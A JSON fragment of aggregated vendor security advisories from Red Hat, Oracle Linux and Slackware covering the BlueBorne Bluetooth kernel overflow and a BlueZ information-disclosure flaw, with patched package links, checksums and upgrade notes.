"https://access.redhat.com/errata/RHSA-2017:2685", "type": "redhat", "title": "(RHSA-2017:2685) Moderate: bluez security update", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-13T18:45:59", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. (CVE-2017-1000251, Important)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "modified": "2017-09-12T17:14:17", "published": "2017-09-12T17:05:39", "id": "RHSA-2017:2683", "href": "https://access.redhat.com/errata/RHSA-2017:2683", "type": "redhat", "title": "(RHSA-2017:2683) Important: kernel security update", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:47", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. (CVE-2017-1000251, Important)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "modified": "2017-09-13T17:25:32", "published": "2017-09-13T17:15:29", "id": "RHSA-2017:2706", "href": "https://access.redhat.com/errata/RHSA-2017:2706", "type": "redhat", "title": "(RHSA-2017:2706) Important: kernel security update", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:03", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. (CVE-2017-1000251, Important)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "modified": "2018-04-12T03:32:49", "published": "2017-09-12T17:03:12", "id": "RHSA-2017:2679", "href": "https://access.redhat.com/errata/RHSA-2017:2679", "type": "redhat", "title": "(RHSA-2017:2679) Important: kernel security update", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:53", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. (CVE-2017-1000251, Important)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "modified": "2018-06-07T18:23:29", "published": "2017-09-12T17:03:08", "id": "RHSA-2017:2681", "href": "https://access.redhat.com/errata/RHSA-2017:2681", "type": "redhat", "title": "(RHSA-2017:2681) Important: kernel security update", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:12", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. (CVE-2017-1000251, Important)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "modified": "2017-09-12T18:51:03", "published": "2017-09-12T17:03:25", "id": "RHSA-2017:2680", "href": "https://access.redhat.com/errata/RHSA-2017:2680", "type": "redhat", "title": "(RHSA-2017:2680) Important: kernel security update", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:39", "bulletinFamily": "unix", "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. (CVE-2017-1000251, Important)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "modified": "2018-06-07T18:14:49", "published": "2017-09-13T17:15:19", "id": "RHSA-2017:2705", "href": "https://access.redhat.com/errata/RHSA-2017:2705", "type": "redhat", "title": "(RHSA-2017:2705) Important: kernel-rt security update", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:49", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. (CVE-2017-1000251, Important)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "modified": "2017-09-12T19:11:57", "published": "2017-09-12T17:04:07", "id": "RHSA-2017:2682", "href": "https://access.redhat.com/errata/RHSA-2017:2682", "type": "redhat", "title": "(RHSA-2017:2682) Important: kernel security update", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:20", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. (CVE-2017-1000251, Important)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\n\nBug Fix(es):\n\n* Previously, while the MAP_GROWSDOWN flag was set, writing to the memory which was mapped with the mmap system call failed with the SIGBUS signal. This update fixes memory management in the Linux kernel by backporting an upstream patch that enlarges the stack guard page gap. As a result, mmap now works as expected under the described circumstances. (BZ#1474722)", "modified": "2017-09-14T17:30:33", "published": "2017-09-14T17:27:01", "id": "RHSA-2017:2731", "href": "https://access.redhat.com/errata/RHSA-2017:2731", "type": "redhat", "title": "(RHSA-2017:2731) Important: kernel security and bug fix update", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:17", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. (CVE-2017-1000251, Important)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\n\nBug Fix(es):\n\n* Previously, while the MAP_GROWSDOWN flag was set, writing to the memory which was mapped with the mmap system call failed with the SIGBUS signal. This update fixes memory management in the Linux kernel by backporting an upstream patch that enlarges the stack guard page gap. As a result, mmap now works as expected under the described circumstances. (BZ#1474723)", "modified": "2017-09-13T17:21:29", "published": "2017-09-13T17:15:37", "id": "RHSA-2017:2707", "href": "https://access.redhat.com/errata/RHSA-2017:2707", "type": "redhat", "title": "(RHSA-2017:2707) Important: kernel security and bug fix update", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:28", "bulletinFamily": "unix", "description": "[4.66-2]\n- sdpd heap fixes\nResolves: #1490008", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "ELSA-2017-2685", "href": "http://linux.oracle.com/errata/ELSA-2017-2685.html", "title": "bluez security update", "type": "oraclelinux", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:51", "bulletinFamily": "unix", "description": "[3.10.0-693.2.2.0.1.el7.OL7]\n- [ipc] ipc/sem.c: bugfix for semctl(,,GETZCNT) (Manfred Spraul) [orabug 22552377]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel (olkmod_signing_key.x509)(alexey.petre\nnko@oracle.com)\n- Update x509.genkey [bug 24817676]\n[3.10.0-693.2.2.el7]\n- [net] l2cap: prevent stack overflow on incoming bluetooth packet (Neil Horman) [1489788 1489789] {CVE-2017-1000251}", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "ELSA-2017-2679-1", "href": "http://linux.oracle.com/errata/ELSA-2017-2679-1.html", "title": "1 ", "type": "oraclelinux", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:44", "bulletinFamily": "unix", "description": "- [3.10.0-693.2.2.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel (olkmod_signing_key.x509)(alexey.petrenko@oracle.com)\n- Update x509.genkey [bug 24817676]\n[3.10.0-693.2.2]\n- [net] l2cap: prevent stack overflow on incoming bluetooth packet (Neil Horman) [1489788 1489789] {CVE-2017-1000251}", "modified": "2017-09-12T00:00:00", "published": "2017-09-12T00:00:00", "id": "ELSA-2017-2679", "href": "http://linux.oracle.com/errata/ELSA-2017-2679.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:40", "bulletinFamily": "unix", "description": "[2.6.32-696.10.2.OL6]\n- Update genkey [bug 25599697]\n[2.6.32-696.10.2]\n- [net] l2cap: prevent stack overflow on incoming bluetooth packet (Neil Horman) [1490060 1490062] {CVE-2017-1000251}", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "ELSA-2017-2681", "href": "http://linux.oracle.com/errata/ELSA-2017-2681.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2019-05-30T07:36:37", "bulletinFamily": "unix", "description": "New bluez packages are available for Slackware 13.1, 13.37, 14.0, 14.1, 14.2,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/bluez-5.47-i586-1_slack14.2.txz: Upgraded.\n Fixed an information disclosure vulnerability which allows remote attackers\n to obtain sensitive information from the bluetoothd process memory. This\n vulnerability lies in the processing of SDP search attribute requests.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000250\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bluez-4.64-i486-2_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bluez-4.64-x86_64-2_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bluez-4.91-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bluez-4.91-x86_64-2_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bluez-4.99-i486-3_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bluez-4.99-x86_64-3_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bluez-4.99-i486-4_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bluez-4.99-x86_64-4_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/bluez-5.47-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/bluez-5.47-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bluez-5.47-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bluez-5.47-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.1 package:\nc34a144a27aecf012ae0f6d4e9d23ec7 bluez-4.64-i486-2_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n00fdad5615839cb6846780890ecd473d bluez-4.64-x86_64-2_slack13.1.txz\n\nSlackware 13.37 package:\n0b24842a0c3e6b19bdd45705a155f82f bluez-4.91-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n01ec2415e62f36ba954ad18316089963 bluez-4.91-x86_64-2_slack13.37.txz\n\nSlackware 14.0 package:\neadceb46961b159ea4580c65f37e1bb3 bluez-4.99-i486-3_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n7a8c9f38fbfca7c8dd35997dbe1e6da2 bluez-4.99-x86_64-3_slack14.0.txz\n\nSlackware 14.1 package:\n51a0d2992312419dfcdce2335635d613 bluez-4.99-i486-4_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n9b1016510c7292343e81263bee3f6710 bluez-4.99-x86_64-4_slack14.1.txz\n\nSlackware 14.2 package:\n7ee07b8ee57a8272703bcc706d148d75 bluez-5.47-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n0a28a8a20122ee46d3ebeb68450d139d bluez-5.47-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n230c704d9f97690c8eee0bb32aed2c50 n/bluez-5.47-i586-1.txz\n\nSlackware x86_64 -current package:\n2d4d0f25675d824f445c0fbd74c453ee n/bluez-5.47-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bluez-5.47-i586-1_slack14.2.txz", "modified": "2017-09-15T13:16:56", "published": "2017-09-15T13:16:56", "id": "SSA-2017-258-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.505994", "title": "bluez", "type": "slackware", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-30T07:37:23", "bulletinFamily": "unix", "description": "New kernel packages are available for Slackware 14.1, 14.2, and -current to\nfix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/linux-4.4.88/*: Upgraded.\n This update fixes the security vulnerability known as "BlueBorne".\n The native Bluetooth stack in the Linux Kernel (BlueZ), starting at\n Linux kernel version 3.3-rc1 is vulnerable to a stack overflow in\n the processing of L2CAP configuration responses resulting in remote\n code execution in kernel space.\n Be sure to upgrade your initrd after upgrading the kernel packages.\n If you use lilo to boot your machine, be sure lilo.conf points to the correct\n kernel and initrd and run lilo as root to update the bootloader.\n If you use elilo to boot your machine, you should run eliloconfig to copy the\n kernel and initrd to the EFI System Partition.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000251\n https://www.armis.com/blueborne\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.107/kernel-generic-3.10.107-i486-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.107/kernel-generic-smp-3.10.107_smp-i686-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.107/kernel-headers-3.10.107_smp-x86-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.107/kernel-huge-3.10.107-i486-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.107/kernel-huge-smp-3.10.107_smp-i686-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.107/kernel-modules-3.10.107-i486-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.107/kernel-modules-smp-3.10.107_smp-i686-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/linux-3.10.107/kernel-source-3.10.107_smp-noarch-2.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/linux-3.10.107/kernel-generic-3.10.107-x86_64-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/linux-3.10.107/kernel-headers-3.10.107-x86-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/linux-3.10.107/kernel-huge-3.10.107-x86_64-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/linux-3.10.107/kernel-modules-3.10.107-x86_64-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/linux-3.10.107/kernel-source-3.10.107-noarch-2.txz\n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.88/kernel-firmware-20170914git-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.88/kernel-generic-4.4.88-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.88/kernel-generic-smp-4.4.88_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.88/kernel-headers-4.4.88_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.88/kernel-huge-4.4.88-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.88/kernel-huge-smp-4.4.88_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.88/kernel-modules-4.4.88-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.88/kernel-modules-smp-4.4.88_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.88/kernel-source-4.4.88_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.88/kernel-firmware-20170914git-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.88/kernel-generic-4.4.88-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.88/kernel-headers-4.4.88-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.88/kernel-huge-4.4.88-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.88/kernel-modules-4.4.88-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.88/kernel-source-4.4.88-noarch-1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-firmware-20170914git-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-generic-4.9.50-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-generic-smp-4.9.50_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-huge-4.9.50-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-huge-smp-4.9.50_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-modules-4.9.50-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-modules-smp-4.9.50_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/kernel-headers-4.9.50_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/k/kernel-source-4.9.50_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-firmware-20170914git-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-generic-4.9.50-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-huge-4.9.50-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/kernel-modules-4.9.50-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/kernel-headers-4.9.50-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/k/kernel-source-4.9.50-noarch-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.1 packages:\n5dc7b2058c14f01a17595cd374fc516a kernel-generic-3.10.107-i486-2.txz\n4b85215f43427662a5aeae4f901e3ce5 kernel-generic-smp-3.10.107_smp-i686-2.txz\n61da0098796c273e8d2e430a16d63567 kernel-headers-3.10.107_smp-x86-2.txz\n32905795bfcb581569f5f3530c280052 kernel-huge-3.10.107-i486-2.txz\nb5713abf49bbf3ac47b789ab8ca6b4b8 kernel-huge-smp-3.10.107_smp-i686-2.txz\ne51dd6bb24404cc0ab468d68f7fcafb2 kernel-modules-3.10.107-i486-2.txz\nbde3a57da890dc6d662ed76065539474 kernel-modules-smp-3.10.107_smp-i686-2.txz\n747da6a4b44a53584dfe018f14ac0bcf kernel-source-3.10.107_smp-noarch-2.txz\n\nSlackware x86_64 14.1 packages:\nea7d675af2f2b02d498e2723f3d0c30b kernel-generic-3.10.107-x86_64-2.txz\n1a5f183a32db2968e0063d987ea2e90c kernel-headers-3.10.107-x86-2.txz\n376c83ed81203dc30404b5656069d271 kernel-huge-3.10.107-x86_64-2.txz\necc276ef85dd9d8eb643d33e1203c418 kernel-modules-3.10.107-x86_64-2.txz\nfce4a64e08b0230322a1241e7fd30f96 kernel-source-3.10.107-noarch-2.txz\n\nSlackware 14.2 packages:\n75d6214d28107e508e6ef2f8d5e2ad30 kernel-firmware-20170914git-noarch-1.txz\n3e856cef8cca5e7b2806f61ddd329d22 kernel-generic-4.4.88-i586-1.txz\n9034af0d6747a997fb428a0f0c4123cf kernel-generic-smp-4.4.88_smp-i686-1.txz\nbda60a4fcae355168d3cb2b69a893ed6 kernel-headers-4.4.88_smp-x86-1.txz\n3bf54f060154f74547a41b9a9968b456 kernel-huge-4.4.88-i586-1.txz\n0fc421100e420baff2f5db50e6eea3a9 kernel-huge-smp-4.4.88_smp-i686-1.txz\n9237db6bd8c841140e10e3dd73e4df72 kernel-modules-4.4.88-i586-1.txz\nda6e3ba08df2214bdccc83cf92ebf5bc kernel-modules-smp-4.4.88_smp-i686-1.txz\n91a0cbfe5867a923e6a1a3c10e17dca9 kernel-source-4.4.88_smp-noarch-1.txz\n\nSlackware x86_64 14.2 packages:\n75d6214d28107e508e6ef2f8d5e2ad30 kernel-firmware-20170914git-noarch-1.txz\n4a1f785aa4499d0e537ec1aff1a3a37c kernel-generic-4.4.88-x86_64-1.txz\n6d0573da1b03d145bc1a2a5dd0bc1be7 kernel-headers-4.4.88-x86-1.txz\nd749ce7b95738b3ccef35d889884cee5 kernel-huge-4.4.88-x86_64-1.txz\n1b301c30bc17c566cfa039be37cba7e0 kernel-modules-4.4.88-x86_64-1.txz\ndd10e43d0c9d988527f950cbd180642d kernel-source-4.4.88-noarch-1.txz\n\nSlackware -current packages:\n75d6214d28107e508e6ef2f8d5e2ad30 a/kernel-firmware-20170914git-noarch-1.txz\n24da1061e64d9db55a8a51ff17c1788b a/kernel-generic-4.9.50-i586-1.txz\nb7251929658e143d332285c9dfaebbbe a/kernel-generic-smp-4.9.50_smp-i686-1.txz\n78b5db6e7390c2308b12fa7f30e39a4c a/kernel-huge-4.9.50-i586-1.txz\nbeb8bfa38068b5e41ca8d31454d4a709 a/kernel-huge-smp-4.9.50_smp-i686-1.txz\n5c56e0aae9071e2b86fc35079948792e a/kernel-modules-4.9.50-i586-1.txz\n0f7609c7fe1d4547d4d69444a20894a8 a/kernel-modules-smp-4.9.50_smp-i686-1.txz\n2bbef0e2a7655778a905a8dcc1bf185d d/kernel-headers-4.9.50_smp-x86-1.txz\n30cb739f15575f2e3a26f565e56f81b7 k/kernel-source-4.9.50_smp-noarch-1.txz\n\nSlackware x86_64 -current packages:\n75d6214d28107e508e6ef2f8d5e2ad30 a/kernel-firmware-20170914git-noarch-1.txz\na65db2c7c50f977bf206318c6ba4ac22 a/kernel-generic-4.9.50-x86_64-1.txz\n9408c26be2842103fd1da305ef0bee87 a/kernel-huge-4.9.50-x86_64-1.txz\n14791a8c2a25727b55813472495c3eae a/kernel-modules-4.9.50-x86_64-1.txz\n46b6c5bf8bd922e1f240660283673194 d/kernel-headers-4.9.50-x86-1.txz\n960814ca43da32e02b9822f9d3dfd048 k/kernel-source-4.9.50-noarch-1.txz\n\n\nInstallation 